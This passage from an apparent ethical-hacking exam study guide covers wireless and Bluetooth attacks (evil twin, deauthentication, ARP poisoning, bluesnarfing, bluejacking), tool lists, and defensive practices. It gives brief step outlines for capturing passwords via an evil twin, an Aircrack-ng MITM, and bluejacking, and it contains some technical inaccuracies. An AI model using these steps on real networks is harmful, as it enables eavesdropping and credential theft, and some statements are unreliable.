messages for later replay.
Virus: It is a computer program that can copy itself and infect a computer without the
permission or knowledge of the owner.
Confidentiality attack
In a confidentiality attack, private information is sent over wireless associations. It may be in the
cleartext, or encrypted by 802.11 or higher layer protocols. Some examples of the confidentiality
attack are as follows:






Eavesdropping: It is the process of listening to private conversations and network traffic
to gain confidential information.
Traffic analysis: It is the process of identifying communication patterns and participants
by monitoring transmissions.
Evil twin AP: It is the process of masquerading as an authorized AP by beaconing the
SSID to lure users. A laptop with Internet connectivity (3G or wired connection) and a
mini access point are required to set up evil twin. Take the following steps to set up evil
twin:
1. Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS
X.
2. Broadcast your Wi-Fi connection and capture passwords by running a sniffer
program.
Masquerading: It is the process of impersonating an authorized user in order to gain
specific unauthorized privileges.
Cracking WEP key: It is the process of recovering a WEP key by capturing data using a
passive or active method.
Man-in-the-middle attack: It is the process of intercepting TCP sessions or SSH/SSL
tunnels using MITM tools on an evil twin AP.


Session hijacking: It refers to the exploitation of a valid computer session to gain
unauthorized access to information or services in a computer system.
Honeypot access point: Hackers set up honeypot access point with default SSIDs,
hotspot SSIDs, and corporate SSIDs. Client automatically connects to this AP that
executes various attacks on the client.
Evil twin phishing
Evil twin phishing is the wireless version of the phishing scam. In this attack, an attacker fools
wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a
legitimate provider. He uses a bogus base station that someone connects to using the Wi-Fi
wireless technology. By imitating the name of another, legitimate wireless provider, they can
fool people into trusting the internet services that they are providing. When the users log into
bank or e-mail accounts, the phishers have access to the entire transaction, since it is sent through
their equipment. Unwitting web users are invited to log into the attacker's server with bogus
login prompts, tempting them to give away sensitive information such as usernames and
passwords. Often users are unaware they have been duped until well after the incident has
occurred. Users think they have logged on to a wireless hotspot connection when in fact they
have been tricked into connecting to the attacker's base station. The hacker jams the connection
to the legitimate base station by sending a stronger signal within proximity to the wireless client thereby turning itself into an 'evil twin'.
Availability attack
The primary goal of an availability attack is to prevent legitimate users from accessing resources
in a wireless network. Some examples of an availability attack are as follows:









Disassociation attack: In this attack, the attacker destroys the connectivity between a
station and access point.
ARP cache poisoning attack: In this attack, the attacker sniffs data and sends a spoofed
ARP message to the LAN. Data intended for the router or the network is received when
the spoofed message is sent.
Power saving attack: In this attack, the attacker can use the Traffic Indicating Map
(TIM) message to fool the client to enter a sleep state which was designed for power
saving.
Access point theft: In this attack, the attacker removes an access point from a public
place.
DoS attack: In this attack, the attacker makes a computer resource unavailable to its
intended users.
Beacon flood: In this attack, the attacker makes it difficult for stations to find a
legitimate access point by generating a number of counterfeit 802.11 beacons.
Authenticate flood: In this attack, the attacker sends forged authentication or association
to a target AP's association table from random MACs.
De-authenticate flood: In this attack, the attacker disconnects users from an access point
by flooding stations with forged disassociations or deauthentications.
TKIP MIC exploit: In this attack, the attacker suspends WLAN service by generating
invalid TKIP data to exceed the target AP's MIC error threshold.


EAP-failure: In this attack, the attacker detects a valid 802.1X EAP exchange and sends
a forged EAP-failure message to the station.
Routing attack: It includes eavesdropping, hijacking, DoS, etc.
Authentication attack
The primary goal of an authentication attack is to successfully access unauthorized network
resources by misusing identity of Wi-Fi clients, their personal information, login credentials, etc.
Some examples of authentication attack are as follows:








Application login theft: In this attack, the attacker captures user's login credentials from
cleartext application protocols.
PSK cracking: In this attack, the attacker uses a dictionary tool to recover a
WPA/WPA2 PSK from captured key handshake frames.
Shared key guessing: In this attack, the attacker performs 802.11 shared key
authentication using vendor default, guessed, or cracked WEP keys.
Domain login cracking: In this attack, the attacker uses a brute force or dictionary tool
to recover user credentials by cracking NETBIOS password hashes.
Identity theft: In this attack, the attacker captures a user's credentials from cleartext
802.1X identity response packets.
Password speculation: In this attack, the attacker performs 802.1X authentication to
guess the user password using a captured identity.
LEAP cracking: In this attack, the attacker cracks the NT password hash using a
dictionary attack tool to recover a user's credentials from captured 802.1X LEAP packets.
VPN login cracking: In this attack, an attacker runs the brute force attack on VPN
authentication protocols to recover a user's credentials.
Rogue access point attack
A rogue AP (rogue access point) is a wireless access point that has either been installed on a
secure company network without explicit authorization from a local network administrator, or
has been created to allow a cracker to conduct a man-in-the-middle attack. A rogue access point
creates a security threat to large organizations because anyone with access to the premises can
maliciously install an inexpensive wireless router that can allow access to a secure network to
unauthorized parties. Rogue access points do not employ mutual authentication.
Man-in-the-middle attack
In a man-in-the-middle attack, the attacker connects to the victim's laptop to a fake WLAN
Access Point (AP). For this, the attacker uses the device that receives Bluetooth packets in
promiscuous mode. After that, the device sends forged packets to the mobile and laptop of the
victim. In this attack, the attacker first records the Bluetooth session and then replies to it. The
following steps should be taken to perform an MITM attack using Aircrack-ng:
1. Run airmon-ng in monitor mode and start airodump to discover SSIDs on the interface.
2. De-authenticate the client using aireplay-ng and associate your wireless card with the AP
that you are accessing with aireplay-ng.
Wireless ARP poisoning attack
There is normal flow of wireless traffic between a user's wireless laptop and Access PointB. An
attacker takes the following steps to perform the wireless ARP poisoning attack:
1. An attacker spoofs the MAC address of the user's wireless laptop to authenticate to
Access PointA.
2. Access PointA sends updated MAC address info to the network routers and switches. The
network routers and switches then update the routing and switching tables.
3. The traffic now destined from the network's backbone to the user's system is no longer
sent to Access PointB.
Unauthorized association
Soft access points are useful in providing unauthorized association. Soft access points are client
cards or embedded WLAN radios in some PDAs and laptops. They can be generated
inadvertently or via a virus program. Attackers infect the machine of the victim and activate soft
access points. This facilitates them to make an unauthorized connection to the enterprise
network. Instead of connecting to an enterprise network through the actual access point, attackers
connect to the enterprise network through soft access points.
PDA
Personal digital assistant (PDA) is a term for any small mobile hand-held device that provides
computing and information storage and retrieval capabilities for business or personal use such as
keeping schedule calendars and address book information. Most PDAs have a small keyboard.
Some PDAs have an electronically sensitive pad that accepts handwriting.
Ad hoc network
Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more
wireless devices that communicate directly with each other. The wireless local area network
(WLAN) network interface adapters in the wireless devices generate omni-directional signals
within a limited range called basic service area (BSA). When two wireless devices come within
the range of each other, they immediately form a two-node network and are able to communicate
with each other.
An ad hoc network is non-transitive.
Ad hoc connection attack
Wi-Fi clients communicate directly through an ad hoc mode that does not need an AP to relay
packets. Ad hoc mode is inherently insecure. It does not provide strong authentication and
encryption. Hence, attackers can easily connect to and compromise the enterprise client working
in ad hoc mode.
Jamming
Jamming is a type of Web server attack that is used to compromise a wireless environment. It
denies service to authorized users, as legitimate traffic is jammed by the overwhelming
frequencies of illegitimate traffic. With the help of some tools, an attacker can easily jam the 2.4
GHz frequency in a way that drops the signal to a level where the wireless networks can no
longer function. Some widely used consumer products exist, such as cordless phones, baby
monitors, and Bluetooth-enabled devices, all capable of interrupting the signal of a wireless
network and faltering traffic. The following are Wi-Fi jamming devices:
Wi-Fi jamming
Description
devices
MGT- P6 GPS Range: 10 ~ 20 meters, 4 antennas, 3G: 2110~2170 MHz, and Wi-Fi/
Bluetooth: 2400~2485 MHz
Jammer
MGT- 02
Jammer
Range: 20~50 meters and 4 antennas
MGT- MP200
Jammer
Range: 50-75 m, Barrage + DDS sweep jamming 20 to 2500 MHz, and Omnidirectional antennas
MGT- 03
Jammer
Range: 0~40 meters and 4 antennas
MGT- P6 WiFi Jammer
Range: 10~20 meters, iDen - CDMA - GSM: 850~960 MHz, DCS - PCS:
1805~960 MHz, 3G: 2110~2170 MHz, Wi-Fi / Bluetooth: 2400~2485 MHz,
and 4 antennas
MGT- P3x13
Jammer
Range: 50~200 meters and 3 frequency bands jammed
Mobile phone jammer
A mobile phone jammer is an instrument used to prevent cellular phones from receiving signals
from or transmitting signals to base stations. When used, the jammer effectively disables cellular
phones. These devices can be used in practically any location, but are found primarily in places
where a phone call would be particularly disruptive because silence is expected. It blocks cell
phone use by sending out radio waves along the same frequencies that cellular phones use. This
causes enough interference with the communication between cell phones and towers to render
the phones unusable. On most retail phones, the network would simply appear out of range.
Email jamming
Email jamming is the use of sensitive words in e-mails to jam the authorities that listen in on
them by providing a form of a red herring and an intentional annoyance. In this attack, the
attacker deliberately includes "sensitive" words and phrases in otherwise innocuous emails to
ensure that these are picked up by the monitoring systems. As a result, the senders of these
emails will eventually be added to a "harmless" list and their emails will be no longer
intercepted; hence, it will allow them to regain some privacy.
WAP
Wireless Access Point (WAP) is a communication device that is capable of both transmitting and
receiving signals in a wireless LAN. This unit is connected to servers or directly to a network
and other devices using a standard cabled network protocol.
WTLS
Wireless Transport Layer Security (WTLS) is a security layer of WAP, which is specifically
designed for a wireless environment. It provides privacy, data integrity, and authentication for
client-server communications over a wireless network. WTLS ensures that a client and server are
authenticated so that wireless transactions remain secure and the connection is encrypted. WTLS
is required because a wireless network does not provide end-to-end security.
WEP
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks
(WLANs). It has two components, i.e., authentication and encryption. It provides security for
wireless networks. WEP encrypts data on a wireless network by using a fixed secret key. WEP
incorporates a checksum in each frame to provide protection against the attacks that attempt to
reveal the key stream.
IEEE 802.1X Authentication
The IEEE 802.1X standard defines a method of authenticating and authorizing users to connect
to an IEEE 802 LAN. It blocks users from accessing the network on the failure of authentication.
IEEE 802.1X supports the Extensible Authentication Protocol-Transport Level Security (EAPTLS) and Protected EAP-Microsoft Challenge Handshake Authentication Protocol version 2
(PEAP-MS-CHAP v2) protocols. In the IEEE802.1X authentication system, an access point
receives a connection request from a wireless client and forwards the request to the RADIUS
server. The RADIUS server then uses the Active Directory database to determine whether the
client should be granted access to the network.
Shared Key Authentication
Shared Key is an authentication method used by wireless LANs, which follow the IEEE 802.11
standard. Wireless devices authenticate each other by using a secret key that is kept by both
devices. Shared Key authentication is not very secure, as all the computers in the basic service
set (BSS) use the same key. Hence, any security lapse on one computer can compromise the
security of the entire BSS. The WEP algorithm is required to be implemented to enable Shared
Key authentication.
15.3 Understand wireless hacking methodology, and assess wireless hacking tools
Exam Focus: Understand wireless hacking methodology, and assess wireless hacking tools.
Objective includes:


Understand wireless hacking methodology.
Assess wireless hacking tools.
Wireless hacking methodology
The wireless hacking methodology is used to gain unauthorized access to network resources by
compromising a Wi-Fi network.
The following is the wireless hacking methodology:





Wi-Fi discovery
GPS mapping
Wireless traffic analysis
Launch wireless attacks
Crack Wi-Fi encryption
Finding Wi-Fi networks for attacks
An attacker checks the potential networks that are in his range to determine the best one to
attack. Use a Wi-Fi enabled laptop with a wireless discovery tool installed to map out active
wireless networks. A laptop with Wi-Fi card, external Wi-Fi antenna, and network discovery
programs can be used to discover Wi-Fi networks.
Footprint the wireless network
Discovering and footprinting the wireless networks begin in an active or passive way when an
attack is made on a wireless network. The following are footprinting methods:


Passive method: This method is used to detect the existence of the AP. It involves
sniffing the packets from the airwaves. This will reveal the AP, SSID, and attacker's
wireless devices that are live.
Active method: In this method, a probe request with the SSID are sent by the attacker's
wireless device to check whether the AP responds or not. The wireless device will send
the probe request with an empty SSID if the wireless device does not have the SSID in
the beginning.
Wi-Fi discovery tools
The following are Wi-Fi discovery tools:










WiFi Hopper
Wavestumbler
iStumbler
WiFinder
Meraki WiFi Stumbler
Wellenreiter
AirCheck Wi-Fi Tester
AirRadar 2
inSSIDer
NetSurveyor



NetStumbler
Vistumbler
WirelessMon
NetSurveyor
NetSurveyor is an 802.11 network discovery tool used to collect information about adjacent
wireless access points in real time and display this information in an advantageous way. The data
is displayed using various different diagnostic views and charts. Data can be recorded for later
use. Generally, NetSurveyor generates reports in Adobe PDF format.
NetStumbler
NetStumbler is a Windows-based tool that is used for the detection of wireless LANs using the
IEEE 802.11a, 802.11b, and 802.11g standards. It detects wireless networks and marks their
relative position with a GPS. It uses an 802.11 Probe Request that has been sent to the broadcast
destination address. When NetStumbler is connected to a GPS, it records a GPS coordinate for
the highest signal strength found at each access point. The main features of NetStumbler are as
follows:


It displays the signal strength of a wireless network, MAC address, SISD, channel details,
etc.
It is commonly used for:
1. War driving
2. Detecting unauthorized access points
3. Detecting causes of interference on a WLAN
4. WEP ICV error tracking
5. Making Graphs and Alarms on 802.11 Data, including Signal Strength
How to detect NetStumbler and identify it?
NetStumbler uses an organizationally unique identifier (OID) of 0x00601d and a protocol
identifier (PID) of 0x0001. It also uses a data payload size of 58 bytes containing a unique string
that can be used to identify the version of NetStumbler. For example, Version 3.2.0 carries
'Flurble gronk bloopit, bnip Frundletrune', Version 3.2.3 has a payload string 'All your 802.11b
are belong to us', and 3.3.0 has a payload string that is intentionally left blank. Hence, with the
help of these fingerprints, not only can a network administrator easily detect the symptoms of
NetStumbler, but he can also identify the version of NetStumbler being used by an attacker.
Vistumbler
Vistumbler is a wireless network scanner used to find out wireless access points. It is written in
AutoIT for Vista, Windows 7, and Windows 8. Vistumbler uses the 'netsh wlan show networks
mode=bssid' Vista command to get wireless information. It supports GPS and live Google Earth
tracking.
WirelessMon
WirelessMon is a tool used to monitor the status of a wireless Wi-Fi adapter and collect
information about nearby wireless access points and hot spots in real time. It logs all wireless
information that it has collected into a file for archival purposes and future reference.
GPS mapping
An attacker creates a map of discovered Wi-Fi networks and uses statistics gathered by Wi-Fi
discovery tools to create a database. GPS is used for tracking the location of the discovered WiFi networks and uploading the coordinates to sites such as WIGLE.
WIGLE
WIGLE (Wireless Geographic Logging Engine) is a GPS mapping tool. It is a Website used to
collect information about various wireless hotspots around the world. Users can register on this
site and upload hotspot data, such as GPS coordinates, SSID, MAC address, and the encryption
type used on the hotspots discovered.
Discover Wi-Fi network using Wardriving
Take the following steps to discover Wi-Fi network using Wardriving:
1. Register with WIGLE and download map packs of your area in order to view the plotted
access points on a geographic map.
2. Connect the antenna, GPS device to the laptop through a USB serial adapter and board on
a car.
3. Install and launch NetStumbler and WIGLE client software and turn on the GPS device.
4. Drive the car at a speed of 35 mph or below.
5. Capture and save the NetStumbler log file that includes GPS coordinates of the access
points. Upload this log file to WIGLE. This will then automatically plot the points onto a
map.
Wireless traffic analysis
An attacker can identify vulnerabilities and susceptible victims in a target wireless network by
performing wireless traffic analysis. Wireless traffic analysis is helpful in determining the
strategy that is appropriate for a successful attack. Wireless packets can be easily sniffed and
analyzed as traffic over the air is not serialized. The attacker analyzes a wireless network in order
to determine broadcast SSID, presence of multiple access points, possibility of recovering
SSIDs, authentication method used, and WLAN encryption algorithm.
Wireless cards and chipsets
It is important to select the right Wi-Fi card since tools such as Aircrack-ng and KisMAC are
used only with selected wireless chipsets.
AirPcap
The AirPcap adapter is used to capture full 802.11 data, management, and control frames. These
frames can be viewed in Wireshark for in-depth protocol dissection and analysis. AirPcap can
decrypt WEP/WPA-encrypted frames if configured. It is used for traffic injection to secure the
wireless network and is supported in Aircrack-ng, Cain & Abel, and Wireshark.
Wireless sniffers
The following are wireless sniffers:








ApSniff
NetworkMiner
Airscanner Mobile Sniffer
Observer
WifiScanner
Mognet
AirTraf
Prism2Dump
CommView
CommView is a network monitor and analyzer designed for an individual who wants a full
picture of the traffic flowing through a PC or LAN segment. It is used to collect information
from the wireless adapter and decode the analyzed data.
OmniPeek
OmniPeek is a packet analyzer software tool used for network troubleshooting and protocol
analysis. The OmniPeek network analyzer offers an intuitive, easy-to-use graphical interface that
engineers can use to rapidly analyze and troubleshoot enterprise networks.
Kismet
Kismet is a Linux-based 802.11 wireless network sniffer and intrusion detection system. It can
work with any wireless card that supports raw monitoring (rfmon) mode. Kismet can sniff
802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet can be used for the following tasks:




To identify networks by passively collecting packets
To detect standard named networks
To detect masked networks
To collect the presence of non-beaconing networks via data traffic
Spectrum analyzer
The RF spectrum analyzer performs the following functions:


It examines the Wi-Fi radio transmission.
It measures the power (amplitude) of radio signals and RF pulses and transfers the
measurements into numeric sequences.
Spectrum analyzers use statistical analysis to plot spectral usage, quantify air quality, and isolate
transmission sources. RF technicians use RF spectrum analyzers for the following purposes:

Install and maintain wireless networks.


Identify sources of interference.
Help in detection of wireless attacks
Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, and WifiEagle are spectrum analysis tools.
RF monitoring tools
The following are RF monitoring tools:







NetworkManager
KWaveControl
KWiFiManager
NetworkControl
Qwireless
KOrinoco
APHunter
Wi-Fi Connection Manager tools
The following are Wi-Fi Connection Manager tools:








Aironet Wireless LAN
Boingo
Odyssey Access Client
HandyWi
Wireless Zero Config
QuickLink Mobile
Mobile Connect
Intel PROSet
Wi-Fi Traffic Analyzer tools
The Wi-Fi Traffic Analyzer tools:








Aruba Spectrum Analyzer
OptiView Network Analyzer
Ufasoft Snif
Network Assistant
AirMagnet Handheld Analyzer
Network Packet Analyzer
Network Observer
vxSniffer
Wi-Fi Raw Packet Capturing tools
The following are Wi-Fi Raw Capturing tools:





WirelessNetView
Pirni Sniffer
Tcpdump
Airview
PCAGizmo
Wi-Fi Spectrum Analyzing tools
The following are Wi-Fi Spectrum Analyzing tools:





Cisco Spectrum Expert
WifiSleuth
Wi-Spy
BumbleBee
AirMedic
Aircrack-ng suite
Aircrack-ng suite is a network software suite that includes the following for 802.11 wireless
networks:




Detector
Packet sniffer
WEP
WPA/WPA2- PSK cracker and analysis tool
Disassociation attack
The following image explains the working of a disassociation attack:
Deauthentication attack
The following image explains the working of a deauthentication attack:
Hotspotter
Hotspotter is a wireless hacking tool that is used to detect a rogue access point. It fools users to
connect and authenticate with the hacker's tool. It sends the deauthenticate frame to the victim's
computer that causes the victim's wireless connection to be switched to a non-preferred
connection.
Wireless Zero Configuration (WZC)
Wireless Zero Configuration (WZC), also known as Wireless Auto Configuration or WLAN
AutoConfig, is a wireless connection management utility included with Microsoft Windows XP
and later operating systems as a service that dynamically selects a wireless network to connect
on the basis of users' preferences and various default settings. This can be used instead of, or in
the absence of, a wireless network utility from the manufacturer of a computer's wireless
networking device. The drivers for the wireless adapter query the NDIS Object IDs and pass the
available network names to the service. WZC also introduced some security threats, which are as
follows:


WZC will probe for networks that are already connected. This information can be viewed
by anyone using a wireless analyzer and can be used to set up fake access points to
connect.
WZC attempts to connect to the wireless network with the strongest signal. Attackers can
create fake wireless networks with high-power antennas and cause computers to associate
with his access point.
Airjack
Airjack is a collection of wireless card drivers and related programs. It uses a program called
monkey_jack that is used to automate the MITM attack. Wlan_jack is a DoS tool in the set of
airjack tools which accepts a target source and BSSID to send continuous deauthenticate frames
to a single client or an entire network. In the same way, we can use the tool essid_jack that can
be used to send a disassociate frame to a target client in order to force the client to reassociate
with the network and give up the network SSID.
Ettercap
Ettercap is a UNIX and Windows tool for computer network protocol analysis and security
auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols. It is free open source
software. Ettercap supports active and passive dissection of many protocols (including ciphered
ones) and provides many features for network and host analysis.
AiroPeek
AiroPeek is a Windows-based commercial wireless LAN analyzer for IEEE 802.11b. It supports
all high level protocols such as TCP/IP, NetBEUI, IPX, etc. It can be used to perform the
following tasks:








Site surveys
Security assessments
Channel scanning
Real time and past capture WEP decryption
Client troubleshooting
WLAN monitoring
Remote WLAN analysis
Application layer protocol analysis
OpenBTS
OpenBTS is a software-based GSM access point, allowing standard GSM-compatible mobile
phones to make telephone calls without using existing telecommunication providers' networks.
OpenBTS replaces the traditional GSM operator network switching subsystem infrastructure
from the Base Transceiver Station (BTS) upwards. Instead of forwarding call traffic through to
an operator's mobile switching centre (MSC), the calls are terminated on the same box by
forwarding the data onto the Asterisk PBX via SIP and Voice-over-IP (VoIP).
Bit-flipping attack
A bit-flipping attack is an attack on a cryptographic cipher in which the attacker can change the
ciphertext in such a way as to result in a predictable change of the plaintext, although the attacker
is not able to learn the plaintext itself. Note that this type of attack is not directly against the
cipher itself (as cryptanalysis of it would be), but against a particular message or series of
messages. In the extreme, this could become a Denial of service attack against all messages on a
particular channel using that cipher. The attack is especially dangerous when the attacker knows
the format of the message. In such a situation, the attacker can turn it into a similar message but
one in which some important information is altered. For example, a change in the destination
address might alter the message route in a way that will force re-encryption with a weaker
cipher, thus possibly making it easier for an attacker to decipher the message.
15.4 Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking
Exam Focus: Understand Bluetooth hacking, and understand how to defend against Bluetooth
hacking. Objective includes:


Understand Bluetooth hacking.
Understand how to defend against Bluetooth hacking.
Bluetooth hacking
In Bluetooth hacking, Bluetooth stack implementation vulnerabilities are exploited so that
sensitive data in Bluetooth-enabled devices and network can be compromised. Bluetooth enabled
electronic devices connect and communicate wirelessly via piconets. Piconets are short range, ad
hoc networks.
Bluesmacking attack
In a Bluesmacking attack, the attacker uses the Logical Link Control and Adaptation Layer
Protocol (L2CAP) when performing this type of attack. For this, he creates a data packet larger
than the allowable size in the device and sends it to the victim's device.
Bluesnarfing
In Bluesnarfing, an attacker steals information from a wireless device through a Bluetooth
connection. For this attack, the attacker connects to the OBEX Push target and performs an
OBEX GET request for known filenames, such as 'telecom/pb.vcf' for the devices phone book or
'telecom/cal.vcs' for the devices calendar file.
Security issues while using Bluetooth
The following are the security issues while using Bluetooth:








Short PINs are allowed, which can be easily identified.
The length of the Bluetooth encryption key is negotiable.
In Bluetooth communication, unit key (a link key that one device generates and uses as a
link key with any other device) can be reused, and once used, it becomes public. It can be
used only under full trust environments because every paired device can copy any other
device holding the same unit key.
The master key of the pairing devices is shared.
An attacker can gain unauthorized access to two other users if that attacker has
communicated with either of the other two users before.
In Bluetooth communications, only the device is authenticated, not individual users,
which means anyone can use the device as long as it is authenticated.
In Bluetooth communication, only the individual links are encrypted and authenticated.
Security services such as auditing, non-reputation, etc. do not exist.
Bluejacking
Bluejacking is one of the most common attacks in Bluetooth hacking. In bluejacking, an attacker
sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and
mobile phones.
Bluejack a victim
Take the following steps to bluejack a victim:
1. Choose an area with plenty of mobile users.
2. Create a new contact on your phone address book.
3. Enter the message into the name field.
4.
5.
6.
7.
Save the new contact.
Select "send via Bluetooth". This makes a search for any Bluetooth device within range.
Select one phone from the list that is discovered by Bluetooth and send the contact.
You will get the message "card sent" and then listen for the SMS message tone of your
victim's phone.
Bluetooth stack
The following is the Bluetooth stack:
The following are Bluetooth modes:



Discoverable: In this mode, inquiry responses are sent to all queries.
Limited discoverable: In this mode, visibility is for a certain period of time.
Non-discoverable: In this mode, inquiry scan is never answered.
The following are pairing modes:


Non-pairable mode: In this mode, every pairing request is rejected.
Pairable mode: In this mode, request will be paired upon request.
Bluetooth threats
The following are Bluetooth threats:








Leaking calendars and address books: User's personal information can be stolen and
can be used by an attacker for malicious purposes.
Bugging devices: An attacker can instruct the user to call other person using phone. The
attacker can even record their communication.
Sending SMS messages: Terrorists can use the phones of legitimate users to send false
bomb threats to airlines.
Causing financial loses: Hackers can use an international user's phone to send many
MMS messages. This results in a high phone bill.
Remote control: Hackers can remotely control a phone and make phone calls or connect
to the Internet.
Social engineering: Attackers trick Bluetooth users to lower security or disable
authentication for Bluetooth connections to pair with them and steal information.
Malicious code: Mobile phone worms can replicate and spread itself by exploiting a
Bluetooth connection.
Protocol vulnerabilities: An attacker exploits Bluetooth pairings and communication
protocols for the following purposes:
o Stealing data
o Making call
o Sending messages
o Conducting DoS attacks on a device
o Starting phone spying
Bluebug attack
In the Bluebug attack, an attacker exploits the loopholes of Bluetooth and gets unauthorized
access to a Bluetooth-enabled device. By this attack, an attacker can perform the following
unauthorized activities:






Initiate the phone calls.
Send an SMS to any number.
Read SMS from the phone.
Read and write the phonebook entries.
Set the call forwards.
Make an Internet connection.
Short pairing code attack
In a short pairing code attack, the attacker takes advantage of the pairing between two devices by
sharing some secret which is used for future communication. For this, the attacker forces a pair
of Bluetooth devices to repeat the pairing process and eavesdrop on it.
BTKeylogging attack
In a BTKeylogging attack, the attacker uses the PIN Cracking attack to discover the fixed PIN
code of the target Bluetooth keyboard. This attack is possible if the target keyboard has a fixed
PIN code and the attacker knows its BD_ADDR. The attacker uses a protocol analyzer for
intercepting all required information and then uses the keyboard as a keylogger to identify all
packets.
BTVoiceBugging attack
In a BTVoiceBugging attack, the attacker knows the fixed PIN of the target device. For this, he
uses a protocol analyzer and opens a two-way real-time SCO/eSCO link with the headset. The
BTVoiceBugging attack is possible when the attacker knows the fixed PIN of the target device.
BlueSpam attack
In a BlueSpam attack, the attacker finds out the other Bluetooth-enabled devices and sends a file
to spam them. This attack is done by using the OBEX protocol. It can be done on any types of
files, such as VCFs, simple ASCII text files, images files, audio, and video files.
PhoneSnoop
PhoneSnoop is BlackBerry spyware. An attacker can use PhoneSnoop to remotely activate the
microphone of a BlackBerry handheld and listen to sounds near or around it. When PhoneSnoop
is used to conduct surveillance on an individual, it solely demonstrates the capabilities of
BlackBerry handheld. PhoneSnoop is purely a proof-of-concept application. It does not have the
stealth or spyware features that can make it malicious.
BlueScanner
BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows. It
discovers Bluetooth devices type such as phone, computer keyboard, and PDA and the services
that the devices advertise. It records all information that can be collected from the device,
without trying to authenticate with the remote device.
Bluetooth hacking tools
The following are Bluetooth hacking tools:








BH Bluejack
Bluesnarfer
Bluediving
Blooover
BTScanner
BTCrack
BTBrowser
BTCrawler
Defending against Bluetooth hacking
The following actions can be taken to defend against Bluetooth hacking:






While pairing a device, non-regular patterns should be used as PIN keys. Key
combinations that are non-sequential on the keyboard should be used.
Encryption should be enabled when BT connection is established to your PC.
A check of all paired devices should be kept in the past from time to time and any paired
device about which you are not sure should be deleted.
BT should be kept in the disabled state. It should be enabled only when required, and
disabled immediately after the completion of the intended task.
The device should be kept in non-discoverable (hidden) mode.
Any unknown and unexpected request should not be accepted for pairing your device.
Detecting and blocking rogue AP
Detecting rogue AP involves the following:



RF scanning: It involves plugging of re-purchased access points (used for only packet
capturing and analysis) in all wired network for detecting and warning the WLAN
administrator about any wireless devices operating in the nearby area.
AP scanning: It involves using access points that detect neighboring APs operating in
the nearby area to expose the data through its MIBS and web interface
Using wired side input: It is used by network management software to detect rogue Aps.
Network management software uses multiple protocols to detect devices in the LAN.
The following actions should be taken to block rogue AP:


A Denial of Service attack should be launched on the rogue AP to deny access to new
clients.
The switch port to which the AP is connected should be blocked or the AP should be
manually located and pulled physically off the LAN.
15.5 Understand how to defend against wireless attacks, and identify Wi-Fi security tools
Exam Focus: Understand how to defend against wireless attacks, and identify Wi-Fi security
tools. Objective includes:


Understand how to defend against wireless attacks.
Identify Wi-Fi security tools.
Defending against wireless attacks
The following are Wi-Fi configuration best practices:

The default SSID should be changed after WLAN configuration.





The router access password should be set and firewall protection should be enabled.
SSID broadcasts should be disabled.
Remote router login and wireless administration should be disabled.
MAC address filtering on your access point or router should be enabled.
Encryption on the access point should be enabled and passphrase should be often
changed.
The following are SSID: best practices:






SSID cloaking should be used to keep certain default wireless messages from
broadcasting the ID to everyone.
You should not use your SSID, company name, network name, or any easy to guess
string in passphrases.
A firewall or packet filter should be placed in between the AP and the corporate Intranet.
The strength of the wireless network should be limited to prevent it from being detected
outside the bounds of your organization.
The wireless devices should be checked regularly for configuration or setup problems.
A different technique should be implemented to encrypt traffic.
The following are Wi-Fi authentication best practices:






WPA should be chosen instead of WEP.
WPA2 Enterprise should be implemented wherever possible.
The network should be disabled when it is not needed.
Wireless access points should be placed in a secured location.
Drivers on all wireless equipment should be kept updated.
A centralized server should be used for authentication.
Wi-Fi security auditing tools
The following are Wi-Fi security auditing tools:


AirMagnet WiFi Analyzer: It is an industry standard tool used to perform mobile
auditing and troubleshoot enterprise Wi-Fi networks. It helps IT staff in solving end-user
problems related to security threats and wireless network vulnerabilities. AirMagnet WiFi
Analyzer has a full compliance reporting engine that automatically maps collected
network information to requirements for compliance with policy and industry regulations.
AirDefense: It provides single UI-based platform for wireless monitoring, intrusion
protection, automated threat mitigation, etc. It provides tools for the following:
o Rogue detection
o Policy enforcement
o Intrusion prevention
o Regulatory compliance
AirDefense uses distributed sensors that operate in tandem with a hardened purpose-built
server appliance in order to monitor all 802.11 (a/b/g/n) wireless traffic in real-time. In
order to accurately detect all wireless attacks and anomalous behavior, AirDefense
analyzes existing and day-zero threats in real-time against historical data. AirDefense
enables the rewinding and reviewing of detailed wireless activity records. This is useful
in forensic investigations and ensures policy compliance.

Adaptive Wireless IPS (WIPS): It is used to provide wireless-network threat detection
and mitigation against malicious attacks and security vulnerabilities. It can be used to
detect, analyze, and identify wireless threats.
WIPS
Wireless intrusion prevention system (WIPS) monitors the radio spectrum for the presence of
unauthorized, rogue access points and the use of wireless attack tools. The system monitors the
radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever
a rogue access point is detected. Conventionally, it is achieved by comparing the MAC address
of the participating wireless devices. Rogue devices can spoof MAC address of an authorized
network device as their own. WIPS uses the fingerprinting approach to weed out devices with
spoofed MAC addresses. The idea is to compare the unique signatures exhibited by the signals
emitted by each wireless device against the known signatures of pre-authorized, known wireless
devices.
Wi-Fi intrusion prevention systems
The following are Wi-Fi intrusion prevention systems:








SonicWall Wireless Networking
Network Box IDP
TippingPoint IPS
3Com AirProtect
Newbury RF Firewall
AirMobile Server
SpectraGuard Enterprise
WLS Manager
Wi-Fi predictive planning tools
The following are Wi-Fi predictive planning tools:








AirMagnet Planner
Networks RingMaster
Control System Planning Tool
Spot Predictive Site Survey
SpectraGuard Planner
Site Survey Professional
LAN Planner
Wi-Fi Planner
Wi-Fi vulnerability scanning tools
The following are Wi-Fi vulnerability scanning tools:








Karma
FastTrack
Zenmap
WiFiDEnum
Nessus
WiFiZoo
OSWA
Security Assessment Toolkit
EAP-TLS Protocol
Extensible Authentication Protocol-Transport Level Security (EAP-TLS) is an authentication
protocol, which provides mutual authentication, integrity-protected negotiation of cryptographic
service providers, and a secret key exchange between two systems that use public key
cryptography. EAP-TLS works on a network that is configured for Public Key Infrastructure
(PKI) and uses certificates for authentication. These certificates can be stored on computers or on
smart cards.
15.6 Examine Wireless Penetration Testing Framework
